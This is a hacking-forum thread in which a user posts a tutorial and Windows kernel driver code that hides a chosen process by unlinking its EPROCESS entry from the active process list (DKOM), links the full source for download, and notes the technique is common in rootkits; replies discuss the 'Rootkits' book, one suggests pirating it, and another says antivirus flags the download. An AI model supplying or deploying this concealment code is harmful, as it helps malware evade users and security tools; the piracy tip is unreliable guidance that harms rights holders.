» Process Hiding

[macd3v]

Tutorial writen by xWeasel

Hey guys.
I've written a (sorta) simple program which lets you hide any process you want. It works by using DKOM (Direct Kernel Object Manipulation). To understand how this works, you need to understand how process listing in Windows works.

Each process has an EPROCESS struct (which isn't officially documented) in the kernel's memory. This structure contains info such as PID, exe name, and a whole whackload of stuff. The struct member that interests us is: LIST_ENTRY ActiveProcessLinks. Here's the MSDN page for LIST_ENTRY: LIST_ENTRY
The Flink member of this struct points to the next entry (process) in the doubly-linked list. The Blink member points to the previous entry (process).
Here's diagram explaining how this works:



So, in order to hide a process, all we need to do is disconnect it from the doubly-linked list. Sound simple, huh? Well it is. All we need to do is set the Flink of the process preceding the process we want to hide to the Flink of the process we're hiding. Same is done with the Blink of the next process, which is set to the Blink of the process being hidden. This is all accomplished in a few lines of code. I attached the full source to this post, but I'll post the code that does the hiding here so you can take a look:

Code:

if(PsLookupProcessByProcessId((PVOID)hps->uPid, &pEProc) == STATUS_SUCCESS){ //get EPROCESSstruct for the process we want to hide
    DbgPrint("EPROCESS found. Address: %08lX.\n", pEProc);
    DbgPrint("Now hiding process %d...\n", hps->uPid);
    dwEProcAddr = (ULONG) pEProc; //get address of process's EPROCESS struct
    __try{ //try/except just in case, so we don't get a BSOD
        pListProcs = (PLIST_ENTRY) (dwEProcAddr + hps->uFlinkOffset); //pListProcs is a LIST_ENTRY struct, which is set to the LIST_ENTRY struct
                                                                          //in the process being hidden (uLinkOffset varies between 2k and XP)
        *((ULONG*) pListProcs->Blink) = (ULONG) (pListProcs->Flink);   //set flink of prev proc to flink of cur proc
        *((ULONG*) pListProcs->Flink+1) = (ULONG) (pListProcs->Blink); //set blink of next proc to blink of cur proc
        pListProcs->Flink = (PLIST_ENTRY) &(pListProcs->Flink); //set flink and blink of cur proc to themselves
        pListProcs->Blink = (PLIST_ENTRY) &(pListProcs->Flink); //otherwise might bsod when exiting process
        DbgPrint("Process now hidden.\n");
    }__except(EXCEPTION_EXECUTE_HANDLER){
        NtStatus = GetExceptionCode();
        DbgPrint("Exception: %d.\n", NtStatus);
    }
    NtStatus = STATUS_SUCCESS;
}

After the process is hidden, the doubly-linked list looks something like this:



So when a program is listing processes, it skips over the one that we hid. This kind of technique is commonly used by rootkits to conceal their processes. This method has its own pros and cons, such as being easier to write than a hook, and in some cases easier or harder to detect.

Here's an example of what you can do with this program:



This program works on Windows XP (any version) and Windows 2000 (tested on Professional, but should work on all).
I suggest reading Rootkits: Subverting the Windows Kernel if you want to learn more about techniques such as this (and this code is partially based on info in that book, but simplified a bit).
P.S. I'm not responsible for how you use this code and/or any damages that may be caused as a result of you using this code.

Source

Code:

 HideProc.zip -- FileFactory.com - free file hosting -- 

[K1llTh3C0rruption]

nice. I ordered a copy of Rootkits: Subverting the Windows Kernel and expect to get a lot out of it.

Note to anyone who wants the Rootkits book: I looked in about 5 different stores today and nobody had it. Your best bet is to get it online. I ordered mine on Amazon.

[MaXe]

The book is easy to find on the web, just search for it on rapidshare :-D

[K1llTh3C0rruption]

I like a hard copy. I can't stand reading on a screen.
But I got my copy and love it!

[lordsteam]

LOL Virused AV detect it as Spy.Keylogger.TrojanNDQ lol ahha

[MaXe]

Quote:

Originally Posted by K1llTh3C0rruption

I like a hard copy. I can't stand reading on a screen.
But I got my copy and love it!

I prefer hard copies too, easier to read (it has been researched that it is
easier to read longer texts / documents in hard copy form due to the nature
of text that is displayed virtually as well).